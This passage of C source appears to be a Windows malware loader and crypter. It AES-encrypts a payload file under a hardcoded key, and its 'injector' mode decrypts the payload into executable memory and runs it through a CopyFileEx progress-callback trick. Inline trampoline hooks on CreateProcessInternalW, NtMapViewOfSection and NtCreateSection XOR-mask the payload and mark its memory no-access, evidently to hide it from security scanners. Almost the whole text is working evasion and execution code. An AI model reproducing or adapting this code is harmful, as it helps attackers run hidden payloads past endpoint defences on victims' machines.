168 | return 0;
169 | int i = 0;
170 | while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) {
171 | if (0 == out_len) {
172 | break;
173 | }
174 | readTotalSize += out_len;
175 | if (readTotalSize == inputSize) {
176 | isFinal = TRUE;
177 | }
178 |
179 | if (isDecrypt) {
180 | if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) {
181 | break;
182 | }
183 | }
184 | else {
185 | if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
186 | break;
187 | }
188 | }
189 | DWORD written = 0;
190 |
191 | if (i != 0)
192 | memcpy(kaka + 80 * i, chunk, out_len);
193 | else
194 | {
195 | memcpy(kaka, chunk, out_len);
196 |
197 | }
198 | i++;
199 |
200 | /*if (!isDecrypt)
201 | {
202 | if (!WriteFile(hOutFile, chunk, out_len, &written, NULL)) {
203 | printf("writing failed!\n");
204 | break;
205 | }
206 | }*/
207 | memset(chunk, 0, chunk_size);
208 | }
209 | *bytes = inputSize;
210 | CryptReleaseContext(hProv, 0);
211 | CryptDestroyKey(hKey);
212 | CryptDestroyHash(hHash);
213 | //memset(random, '\0', 16);
214 | CloseHandle(hInpFile);
215 | /*if (!isDecrypt)
216 | CloseHandle(hOutFile);
217 | if (isDecrypt == FALSE)
218 | {
219 | HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
220 | CloseHandle(hInpFile);
221 | }*/
222 |
223 |
224 | return kaka;
225 |
226 |
227 |
228 |
229 |
230 | }
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 | char* crypter(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate)
239 | {
240 | if (strlen(path) > MAX_PATH)
241 | return 0;
242 | char filename[266];
243 | char filename2[260 + 6];
244 | if (!isDecrypt)
245 | {
246 |
247 | strcpy_s(filename, 266, path);
248 | strcpy_s(filename2, 266, path);
249 | strcat_s(filename2, 266, extension);
250 |
251 | }
252 | else
253 | {
254 | strcpy_s(filename, 266, path);
255 | }
256 |
257 |
258 |
259 | wchar_t default_key[] = L"7fwivcli7r#auzS";
260 | wchar_t* key_str = default_key;
261 |
262 | size_t len = lstrlenW(key_str);
263 | FILE* fp = fopen(path, "rb");
264 | if (!fp)
265 | {
266 | printf("Error\n");
267 | return 0;
268 | }
269 | fseek(fp, 0L, SEEK_END);
270 | size_t sz = ftell(fp);
271 | rewind(fp);
272 | char* buf = (char*)malloc(sz);
273 | int charsTransferred = fread(buf, 1, sz, fp);
274 | fclose(fp);
275 | fp = fopen(path, "wb+");
276 | const char* aux = "\x41\x41\x41\x41\x90\x90\x90\x90";
277 | fwrite(aux, 8, 1, fp);
278 | fwrite(buf, 1, sz, fp);
279 | fclose(fp);
280 | free(buf);
281 |
282 | HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
283 |
284 | if (hInpFile == INVALID_HANDLE_VALUE) {
285 |
286 | return 0;
287 | }
288 |
289 |
290 | HANDLE hOutFile = CreateFileA(filename2, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
291 | if (hOutFile == INVALID_HANDLE_VALUE) {
292 |
293 | return 0;
294 | }
295 |
296 |
297 |
298 | DWORD dwStatus = 0;
299 | BOOL bResult = FALSE;
300 | wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
301 | HCRYPTPROV hProv;
302 |
303 | if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
304 | dwStatus = GetLastError();
305 |
306 | return 0;
307 | }
308 |
309 |
310 |
311 | HCRYPTHASH hHash;
312 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
313 | dwStatus = GetLastError();
314 |
315 | return 0;
316 | }
317 |
318 | if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
319 | DWORD err = GetLastError();
320 |
321 | return 0;
322 | }
323 |
324 | HCRYPTKEY hKey;
325 | if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
326 | dwStatus = GetLastError();
327 |
328 | return 0;
329 | }
330 |
331 |
332 | const size_t chunk_size = CHUNK_SIZE;
333 | BYTE chunk[chunk_size] = { 0 };
334 | DWORD out_len = 0;
335 |
336 | BOOL isFinal = FALSE;
337 | DWORD readTotalSize = 0;
338 | DWORD inputSize = GetFileSize(hInpFile, NULL);
339 | *bytes = inputSize;
340 | if (calculate == TRUE)
341 | {
342 |
343 | CryptReleaseContext(hProv, 0);
344 | CryptDestroyKey(hKey);
345 | CryptDestroyHash(hHash);
346 | CloseHandle(hInpFile);
347 | if (!isDecrypt)
348 | CloseHandle(hOutFile);
349 | return 0;
350 | }
351 |
352 | char* kaka = (char*)malloc(inputSize + 1);
353 | if (!kaka)
354 | return 0;
355 | int i = 0;
356 | while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) {
357 | if (0 == out_len) {
358 | break;
359 | }
360 | readTotalSize += out_len;
361 | if (readTotalSize == inputSize) {
362 | isFinal = TRUE;
363 | }
364 |
365 | if (isDecrypt) {
366 | if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) {
367 | break;
368 | }
369 | }
370 | else {
371 | if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
372 | break;
373 | }
374 | }
375 | DWORD written = 0;
376 |
377 |
378 | if (!isDecrypt)
379 | {
380 | if (!WriteFile(hOutFile, chunk, out_len, &written, NULL)) {
381 | break;
382 | }
383 | }
384 | memset(chunk, 0, chunk_size);
385 | }
386 | *bytes = inputSize;
387 | CryptReleaseContext(hProv, 0);
388 | CryptDestroyKey(hKey);
389 | CryptDestroyHash(hHash);
390 | CloseHandle(hInpFile);
391 | if (!isDecrypt)
392 | CloseHandle(hOutFile);
393 |
394 |
395 | return kaka;
396 |
397 |
398 |
399 |
400 |
401 | }
402 |
403 |
404 |
405 |
406 |
407 |
408 | typedef
409 | BOOL(WINAPI* PCreateProcessInternalW)(
410 | HANDLE hToken,
411 | LPCWSTR lpApplicationName,
412 | LPWSTR lpCommandLine,
413 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
414 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
415 | BOOL bInheritHandles,
416 | DWORD dwCreationFlags,
417 | LPVOID lpEnvironment,
418 | LPCWSTR lpCurrentDirectory,
419 | LPSTARTUPINFOW lpStartupInfo,
420 | LPPROCESS_INFORMATION lpProcessInformation,
421 | PHANDLE hNewToken
422 | );
423 |
424 |
425 | typedef NTSTATUS(NTAPI* myNtMapViewOfSection)
426 | (HANDLE SectionHandle,
427 | HANDLE ProcessHandle,
428 | PVOID* BaseAddress,
429 | ULONG_PTR ZeroBits,
430 | SIZE_T CommitSize,
431 | PLARGE_INTEGER SectionOffset,
432 | PSIZE_T ViewSize,
433 | DWORD InheritDisposition,
434 | ULONG AllocationType,
435 | ULONG Win32Protect);
436 |
437 |
438 |
439 |
440 |
441 |
442 |
443 |
444 |
445 |
446 | char tramp[13] = {
447 | 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
448 | 0x41, 0xFF, 0xE2 // jmp r10
449 | };
450 | char tramp_old[13];
451 |
452 | char tramp2[13] = {
453 | 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
454 | 0x41, 0xFF, 0xE2 // jmp r10
455 | };
456 | char tramp2_old[13];
457 |
458 |
459 | char tramp_ntcreatesection[13] = {
460 | 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov r10, NEW_LOC_@ddress
461 | 0x41, 0xFF, 0xE2 // jmp r10
462 | };
463 | char tramp_old_ntcreatesection[13];
464 |
465 |
466 | BOOL restore_function(HANDLE hToken,
467 | LPCWSTR lpApplicationName,
468 | LPWSTR lpCommandLine,
469 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
470 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
471 | BOOL bInheritHandles,
472 | DWORD dwCreationFlags,
473 | LPVOID lpEnvironment,
474 | LPCWSTR lpCurrentDirectory,
475 | LPSTARTUPINFOW lpStartupInfo,
476 | LPPROCESS_INFORMATION lpProcessInformation,
477 | PHANDLE hNewToken)
478 | {
479 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
480 | PCreateProcessInternalW CreateProcessInternalW;
481 | CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle("kernelbase.dll"), "CreateProcessInternalW");
482 |
483 | DWORD written2,wt3;
484 |
485 | VirtualProtect(CreateProcessInternalW, sizeof CreateProcessInternalW, PAGE_EXECUTE_READWRITE, &written2);
486 | VirtualProtect(tramp_old, sizeof tramp_old, PAGE_EXECUTE_READWRITE, &wt3);
487 |
488 | //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
489 | //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
490 | if (!WriteProcessMemory(hProc, CreateProcessInternalW, &tramp_old, sizeof tramp_old, NULL))
491 | {
492 |
493 | return FALSE;
494 | }
495 | CreateProcessInternalW(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags,
496 | lpEnvironment,
497 | lpCurrentDirectory,
498 | lpStartupInfo,
499 | lpProcessInformation,
500 | hNewToken);
501 | return FALSE;
502 |
503 |
504 |
505 |
506 | return TRUE;
507 | }
508 |
509 |
510 | BOOL restore_ntmap(HANDLE SectionHandle,
511 | HANDLE ProcessHandle,
512 | PVOID* BaseAddress,
513 | ULONG_PTR ZeroBits,
514 | SIZE_T CommitSize,
515 | PLARGE_INTEGER SectionOffset,
516 | PSIZE_T ViewSize,
517 | DWORD InheritDisposition,
518 | ULONG AllocationType,
519 | ULONG Win32Protect)
520 | {
521 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
522 | myNtMapViewOfSection NtMap;
523 | NtMap = (myNtMapViewOfSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtMapViewOfSection");
524 | DWORD written2, written3;
525 |
526 |
527 | VirtualProtect(NtMap, sizeof NtMap, PAGE_EXECUTE_READWRITE, &written2);
528 | VirtualProtect(tramp2_old, sizeof tramp2_old, PAGE_EXECUTE_READWRITE, &written3);
529 |
530 | //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
531 | //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
532 | if (!WriteProcessMemory(hProc, NtMap, &tramp2_old, sizeof tramp2_old, NULL))
533 | {
534 | return FALSE;
535 | }
536 | NtMap(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect);
537 | return 1;
538 |
539 | }
540 |
541 |
542 | BOOL restore_createprocess_hooks(
543 | HANDLE hToken,
544 | LPCWSTR lpApplicationName,
545 | LPWSTR lpCommandLine,
546 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
547 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
548 | BOOL bInheritHandles,
549 | DWORD dwCreationFlags,
550 | LPVOID lpEnvironment,
551 | LPCWSTR lpCurrentDirectory,
552 | LPSTARTUPINFOW lpStartupInfo,
553 | LPPROCESS_INFORMATION lpProcessInformation,
554 | PHANDLE hNewToken)
555 | {
556 | restore_function(hToken,
557 | lpApplicationName,
558 | lpCommandLine,
559 | lpProcessAttributes,
560 | lpThreadAttributes,
561 | bInheritHandles,
562 | dwCreationFlags,
563 | lpEnvironment,
564 | lpCurrentDirectory,
565 | lpStartupInfo,
566 | lpProcessInformation,
567 | hNewToken);
568 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
569 | PCreateProcessInternalW CreateProcessInternalW;
570 | CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle("KERNELBASE.dll"), "CreateProcessInternalW");
571 | DWORD written2;
572 |
573 | VirtualProtect(CreateProcessInternalW, sizeof CreateProcessInternalW, PAGE_EXECUTE_READWRITE, &written2);
574 | DWORD old2;
575 | VirtualProtect(tramp, sizeof tramp, PAGE_EXECUTE_READWRITE, &old2);
576 | if (!WriteProcessMemory(hProc, (LPVOID*)CreateProcessInternalW, &tramp, sizeof tramp, NULL))
577 | {
578 | return FALSE;
579 | }
580 | return TRUE;
581 | }
582 |
583 | BOOL WINAPI hook_CreateProcessA(
584 | HANDLE hToken,
585 | LPCWSTR lpApplicationName,
586 | LPWSTR lpCommandLine,
587 | LPSECURITY_ATTRIBUTES lpProcessAttributes,
588 | LPSECURITY_ATTRIBUTES lpThreadAttributes,
589 | BOOL bInheritHandles,
590 | DWORD dwCreationFlags,
591 | LPVOID lpEnvironment,
592 | LPCWSTR lpCurrentDirectory,
593 | LPSTARTUPINFOW lpStartupInfo,
594 | LPPROCESS_INFORMATION lpProcessInformation,
595 | PHANDLE hNewToken
596 | )
597 | {
598 | HANDLE hHeaps[250];
599 | const char* mask = "MZE";
600 | const char* key = "ASDFASF234124jklsf-4&%/&/";
601 | size_t key_size = sizeof key;
602 | __int64 ii = (__int64)offset;
603 | int keyIndex = 0;
604 | for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
605 | {
606 | *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
607 | keyIndex += 1;
608 | }
609 |
610 | DWORD old;
611 | VirtualProtect(offset, size_offset, PAGE_NOACCESS, &old);
612 |
613 | if (restore_createprocess_hooks(hToken,
614 | lpApplicationName,
615 | lpCommandLine,
616 | lpProcessAttributes,
617 | lpThreadAttributes,
618 | bInheritHandles,
619 | dwCreationFlags,
620 | lpEnvironment,
621 | lpCurrentDirectory,
622 | lpStartupInfo,
623 | lpProcessInformation,
624 | hNewToken) == FALSE)
625 | {
626 | return 0;
627 | }
628 | Sleep(5000);
629 |
630 | VirtualProtect(offset, size_offset, old, &old);
631 |
632 | keyIndex = 0;
633 | for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
634 | {
635 | *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
636 | keyIndex += 1;
637 |
638 | }
639 |
640 |
641 | }
642 |
643 |
644 | using myNtCreateSection = NTSTATUS(NTAPI*)(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
645 |
646 |
647 | NTSTATUS ntCreateMySection (OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
648 | BOOL restore_hook_ntcreatesection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL);
649 |
650 | NTSTATUS ntCreateMySection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL)
651 | {
652 | int isFinal = 0;
653 | char lpFilename[256];
654 | if (FileHandle != NULL)
655 | {
656 |
657 | DWORD res = GetFinalPathNameByHandleA(FileHandle, lpFilename, 256, FILE_NAME_OPENED | VOLUME_NAME_DOS);
658 | if (res == 0)
659 | printf("GetFinalPathNameByHandleA error: %d\n", GetLastError());
660 |
661 | else
662 | {
663 | if (strstr(lpFilename, "WinTypes.dll") != 0)
664 | {
665 | isFinal = 1;
666 | SectionAttributes = SEC_IMAGE_NO_EXECUTE;
667 |
668 | }
669 | }
670 | }
671 | restore_hook_ntcreatesection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageAttributess, SectionAttributes, FileHandle);
672 | return 1;
673 | }
674 |
675 |
676 | BOOL hook_ntcreatesection(HANDLE hProc);
677 | BOOL restore_hook_ntcreatesection(OUT PHANDLE SectionHandle, IN ULONG DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG PageAttributess, IN ULONG SectionAttributes, IN HANDLE FileHandle OPTIONAL)
678 | {
679 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
680 | myNtCreateSection NtCreate;
681 | NtCreate = (myNtCreateSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtCreateSection");
682 | DWORD written2, written3;
683 |
684 |
685 | VirtualProtect(NtCreate, sizeof NtCreate, PAGE_EXECUTE_READWRITE, &written2);
686 | VirtualProtect(tramp_old_ntcreatesection, sizeof tramp_old_ntcreatesection, PAGE_EXECUTE_READWRITE, &written3);
687 |
688 | //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
689 | //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
690 | if (!WriteProcessMemory(hProc, NtCreate, &tramp_old_ntcreatesection, sizeof tramp_old_ntcreatesection, NULL))
691 | {
692 | return FALSE;
693 | }
694 | NtCreate(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, PageAttributess, SectionAttributes, FileHandle);
695 | hook_ntcreatesection(hProc);
696 | return 1;
697 |
698 | }
699 | BOOL hook_ntcreatesection(HANDLE hProc)
700 | {
701 | myNtCreateSection NtCreate;
702 | NtCreate = (myNtCreateSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtCreateSection");
703 | if (!NtCreate)
704 | exit(-1);
705 | DWORD written3;
706 |
707 |
708 | VirtualProtect(NtCreate, sizeof NtCreate, PAGE_EXECUTE_READWRITE, &written3);
709 |
710 | //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
711 | //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
712 | void* shit3 = (void*)ntCreateMySection;
713 |
714 |
715 | memcpy(tramp_old_ntcreatesection, NtCreate, sizeof tramp_old_ntcreatesection);
716 | memcpy(&tramp_ntcreatesection[2], &shit3, sizeof shit3);
717 |
718 | DWORD old3;
719 |
720 | VirtualProtect(tramp2, sizeof tramp_ntcreatesection, PAGE_EXECUTE_READWRITE, &old3);
721 |
722 |
723 | if (!WriteProcessMemory(hProc, (LPVOID*)NtCreate, &tramp_ntcreatesection, sizeof tramp_ntcreatesection, NULL))
724 | {
725 | return -1;
726 | }
727 | return 1;
728 | }
729 |
730 |
731 | __int64 aux, lpdata, cbdata;
732 | int iteration=0;
733 | BOOL hook_ntmap(HANDLE hProc);
734 | NTSTATUS null_function(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect);
735 | BOOL hook_ntmap(HANDLE hProc)
736 | {
737 | myNtMapViewOfSection NtMap;
738 | NtMap = (myNtMapViewOfSection)GetProcAddress(GetModuleHandle("NTDLL.dll"), "NtMapViewOfSection");
739 | if (!NtMap)
740 | exit(-1);
741 | DWORD written3;
742 |
743 |
744 | VirtualProtect(NtMap, sizeof NtMap, PAGE_EXECUTE_READWRITE, &written3);
745 |
746 | //WriteProcessMemory(hProc, &CreateProcessInternalW, &hook_CreateProcessA, sizeof CreateProcessInternalW, NULL);
747 | //WriteProcessMemory(hProc, &CreateProcessInternalW2, &hook_CreateProcessA, sizeof CreateProcessInternalW2, NULL);
748 | void* shit2 = (void*)null_function;
749 |
750 |
751 | memcpy(tramp2_old, NtMap, sizeof tramp2_old);
752 | memcpy(&tramp2[2], &shit2, sizeof shit2);
753 |
754 | DWORD old3;
755 |
756 | VirtualProtect(tramp2, sizeof tramp2, PAGE_EXECUTE_READWRITE, &old3);
757 |
758 |
759 | if (!WriteProcessMemory(hProc, (LPVOID*)NtMap, &tramp2, sizeof tramp2, NULL))
760 | {
761 | return -1;
762 | }
763 | return 1;
764 | }
765 |
766 |
767 |
768 | BOOL restore_hook_image_notification(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect)
769 | {
770 | restore_ntmap(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect);
771 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
772 | hook_ntmap(hProc);
773 | return TRUE;
774 |
775 | }
776 |
777 | typedef struct _OBJECT_TYPE_INFORMATION
778 | {
779 | UNICODE_STRING TypeName;
780 | ULONG TotalNumberOfObjects;
781 | ULONG TotalNumberOfHandles;
782 | ULONG TotalPagedPoolUsage;
783 | ULONG TotalNonPagedPoolUsage;
784 | ULONG TotalNamePoolUsage;
785 | ULONG TotalHandleTableUsage;
786 | ULONG HighWaterNumberOfObjects;
787 | ULONG HighWaterNumberOfHandles;
788 | ULONG HighWaterPagedPoolUsage;
789 | ULONG HighWaterNonPagedPoolUsage;
790 | ULONG HighWaterNamePoolUsage;
791 | ULONG HighWaterHandleTableUsage;
792 | ULONG InvalidAttributes;
793 | GENERIC_MAPPING GenericMapping;
794 | ULONG ValidAccessMask;
795 | BOOLEAN SecurityRequired;
796 | BOOLEAN MaintainHandleCount;
797 | ULONG PoolType;
798 | ULONG DefaultPagedPoolCharge;
799 | ULONG DefaultNonPagedPoolCharge;
800 | } OBJECT_TYPE_INFORMATION, * POBJECT_TYPE_INFORMATION;
801 |
802 | typedef struct __PUBLIC_OBJECT_TYPE_INFORMATION2 {
803 | UNICODE_STRING TypeName;
804 | ULONG Reserved[50]; // reserved for internal use
805 | } PUBLIC_OBJECT_TYPE_INFORMATION2, * PPUBLIC_OBJECT_TYPE_INFORMATION2;
806 |
807 |
808 | NTSTATUS null_function(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect)
809 | {
810 | FILE* fp = fopen("holyshit", "rb");
811 | if (fp)
812 | DeleteFile("holyshit");
813 | HANDLE hHeaps[250];
814 | const char* mask = "MZE";
815 | const char* key = "ASDFASF234124jklsf-4&%/&/";
816 | size_t key_size = sizeof key;
817 | //printf("Doing good\n");
818 | __int64 ii = (__int64)offset;
819 | int keyIndex = 0;
820 | for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
821 | {
822 | *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
823 | keyIndex += 1;
824 | }
825 | //printf("Key index: %d\n", keyIndex);
826 | //printf("Successfully encrypted XOR\n");
827 | DWORD old;
828 | //VirtualProtect(offset, size_offset, PAGE_NOACCESS, &old);
829 |
830 | NtQuerySection* ntsection = (NtQuerySection*)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySection");
831 | SECTION_BASIC_INFORMATION sbi;
832 | HANDLE hProcessCurrent = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
833 | HANDLE dupHandle;
834 | int ress = DuplicateHandle(hProcessCurrent, SectionHandle, hProcessCurrent, &dupHandle, 0x0001, NULL, FALSE);
835 | if (ress == 0) {
836 | if (GetLastError() == ERROR_NOT_SUPPORTED) {
837 | // it is most likely an ETWRegistration
838 | printf("Error not supported\n");
839 | }
840 |
841 | if (GetLastError() == ERROR_ACCESS_DENIED) {
842 | printf("Error access denied\n");
843 | }
844 |
845 | //wprintf(L"Error on DuplicateHandle for %#010x \n", SourceHandle);
846 | //std::wcout << GetLastErrorStdStr();
847 |
848 | }
849 | PUBLIC_OBJECT_TYPE_INFORMATION2 oti;
850 | ULONG retLen;
851 | int queryObjectRet = NtQueryObject(dupHandle, ObjectTypeInformation, &oti, sizeof(oti), &retLen);
852 |
853 | wchar_t* typeName = oti.TypeName.Buffer;
854 | if (hProcessCurrent)
855 | {
856 |
857 |
858 | NTSTATUS stat = ntsection((HANDLE)dupHandle, SectionBasicInformation, &sbi, sizeof sbi, 0);
859 | if (!NT_SUCCESS(stat)) {
860 | //printf("Error on NtQuerySection\n");
861 | printf("Error: %lu\n", GetLastError());
862 | }
863 | if (sbi.Attributes==16777216)
864 | printf("Image no execution mapped\n");
865 |
866 |
867 |
868 | }
869 | DWORD old_noaccess;
870 | BOOL restore = restore_hook_image_notification(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect);
871 | VirtualProtect(offset, 1024, PAGE_NOACCESS, &old_noaccess);
872 |
873 | Sleep(500);
874 | DWORD oldold;
875 | VirtualProtect(offset, 1024, old_noaccess, &oldold);
876 | CloseHandle(hProcessCurrent);
877 | //Sleep(500);
878 | if (restore == FALSE)
879 | {
880 | return 0;
881 | }
882 |
883 | keyIndex = 0;
884 | for (__int64 ij = (__int64)offset; (__int64)ij < (_int64)offset + size_offset; ij += 0x01)
885 | {
886 | *(char*)ij = *(char*)ij ^ key[keyIndex % key_size];
887 | keyIndex += 1;
888 |
889 | }
890 |
891 |
892 | return 1;
893 |
894 | }
895 |
896 |
897 | BOOL hook_createprocess(HANDLE hProc)
898 | {
899 | DWORD written2;
900 | PCreateProcessInternalW CreateProcessInternalW;
901 | CreateProcessInternalW = (PCreateProcessInternalW)GetProcAddress(GetModuleHandle("KERNELBASE.dll"), "CreateProcessInternalW");
902 | if (!CreateProcessInternalW)
903 | exit(-1);
904 | VirtualProtect(CreateProcessInternalW, sizeof CreateProcessInternalW, PAGE_EXECUTE_READWRITE, &written2);
905 |
906 | puts("\n");
907 | void* shit = (void*)hook_CreateProcessA;
908 | memcpy(tramp_old, CreateProcessInternalW, sizeof tramp_old);
909 | memcpy(&tramp[2], &shit, sizeof(shit));
910 | DWORD old2;
911 | VirtualProtect(tramp, sizeof tramp, PAGE_EXECUTE_READWRITE, &old2);
912 | if (!WriteProcessMemory(hProc, (LPVOID*)CreateProcessInternalW, &tramp, sizeof tramp, NULL))
913 | {
914 | return -1;
915 | }
916 | return 1;
917 | }
918 |
919 |
920 |
921 |
922 | int main(int argc, char **argv)
923 | {
924 |
925 | if (argc < 2)
926 | {
927 | printf("Argc: %d\n", argc);
928 | printf("\nUsage: ./%s \n", argv[0]);
929 | return 0;
930 | }
931 |
932 | if (strcmp(argv[1], "crypter") == 0)
933 | {
934 | if (argc != 3)
935 | {
936 | printf("\nUsage: ./%s \n", argv[0]);
937 | return 0;
938 | }
939 | static DWORD size = NULL;
940 | crypter(argv[2], false, &size, false);
941 | printf("Creating file: %s.ramon\n", argv[2]);
942 | return 1;
943 | }
944 | if (strcmp(argv[1], "injector") == 0)
945 | {
946 | if (argc != 3)
947 | {
948 | printf("\nUsage: ./%s \n", argv[0]);
949 | return 0;
950 | }
951 | static DWORD size = NULL;
952 |
953 | encrypter_111(argv[2], true, &size, true);
954 | char* lloc = (char*)malloc(size);
955 | memcpy(lloc, encrypter_111(argv[2], true, &size, false), size);
956 | offset = (void*)lloc;
957 | size_offset = size;
958 | HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, NULL, GetCurrentProcessId());
959 | hook_createprocess(hProc);
960 | hook_ntmap(hProc);
961 | hook_ntcreatesection(hProc);
962 | DWORD dold = NULL;
963 | if (!VirtualProtect(lloc, size, PAGE_EXECUTE_READWRITE, &dold))
964 | return 0;
965 | if (!CopyFileEx(argv[2], "deletefile", (LPPROGRESS_ROUTINE)lloc, NULL, FALSE, 0))
966 | printf("Error: %d\n", GetLastError());
967 | free(lloc);
968 | }
969 |
970 |
971 | }
--------------------------------------------------------------------------------